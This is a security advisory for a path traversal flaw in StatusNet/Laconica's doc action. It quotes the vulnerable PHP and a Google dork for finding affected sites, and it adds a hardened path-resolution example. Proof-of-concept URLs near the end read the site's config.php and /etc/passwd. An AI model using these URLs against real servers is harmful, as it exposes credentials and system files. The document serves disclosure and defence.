StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading



+-------------------------------------------------------------------------------+
+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
+-------------------------------------------------------------------------------+

# Date:
    - 10/10/2013

# Exploit Author:
    - spiderboy

# Vendor Homepage:
    - http://status.net/

# Software Links:
    - http://status.net/laconica-0.7.4.tar.gz
    - http://status.net/statusnet-0.8.2.tar.gz
    - http://status.net/statusnet-0.9.0beta3.tar.gz

# Version:
    - Branch 0.7.X : <= 0.7.4
    - Branch 0.8.X : <= 0.8.2
    - Branch 0.9.X : <= 0.9.0beta3

# Tested on:
    - Unix/Linux

# Category:
    - Webapps

# Platform:
    - php

# Advisories:
    - http://status.net/wiki/Security_alert_0000002
    - http://osvdb.org/show/osvdb/95586

# Google Dork:
    - "It runs the StatusNet microblogging software, version 0.8.2"

# Vendor product description:
    - Free and Open Source social software

# Vulnerable code:
    - actions/doc.php:
    --------------------------------------------------------------------
    function handle($args)
    {
        parent::handle($args);
        $this->title    = $this->trimmed('title');
        $this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
        if (!file_exists($this->filename)) {
            $this->clientError(_('No such document.'));
            return;
        }
        $this->showPage();
    }
    --------------------------------------------------------------------
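    [1] : $this->title comes straight from the request and is concatenated
          into the path with no check, so "../" sequences resolve outside
          doc-src/ and any file readable by the web server can be selected.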
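
A hardened form of the path construction at [1], as an added example (not StatusNet's actual patch and not code from the advisory). The helper name resolve_doc_path(), the allow-list of title characters, the demo directory tree and the use of PHP 7.1+ syntax are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not StatusNet's own fix.
// Resolves a user-supplied document title to a file inside $baseDir,
// or returns null when the title is malformed or escapes the directory.
function resolve_doc_path(string $baseDir, string $title): ?string
{
    // 1. Allow-list (assumed title format): plain names, no separators,
    //    no leading dot, no NUL byte.
    if (!preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*\z/', $title)) {
        return null;
    }
    // 2. Canonicalise both paths. realpath() resolves ".." and symlinks
    //    and returns false when the target does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $title);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must sit under the resolved base.
    //    The trailing separator stops "/doc-src-old" matching "/doc-src".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway install tree with config.php beside doc-src/.
$install = sys_get_temp_dir() . '/statusnet-demo-' . bin2hex(random_bytes(4));
mkdir($install . '/doc-src', 0700, true);
file_put_contents($install . '/doc-src/about', 'About this site');
file_put_contents($install . '/config.php', '<?php // secrets');

// Titles: one legitimate, the two shapes from the advisory, one missing file.
$titles = ['about', '../config.php', '../../../../../../../../etc/passwd', 'missing'];
foreach ($titles as $t) {
    $resolved = resolve_doc_path($install . '/doc-src', $t);
    printf("%-40s => %s\n", $t, $resolved === null ? 'rejected' : 'served');
}

// Clean up the demo tree.
unlink($install . '/doc-src/about');
unlink($install . '/config.php');
rmdir($install . '/doc-src');
rmdir($install);
```

The allow-list alone already rejects the traversal titles; the realpath() containment check remains as a second layer in case a symlink inside doc-src/ points elsewhere.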

# Proof of concept:
    - http://[host]/index.php?action=doc&title=../config.php
    - http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd

# Solution:
    - Upgrade to the latest version: http://status.net/download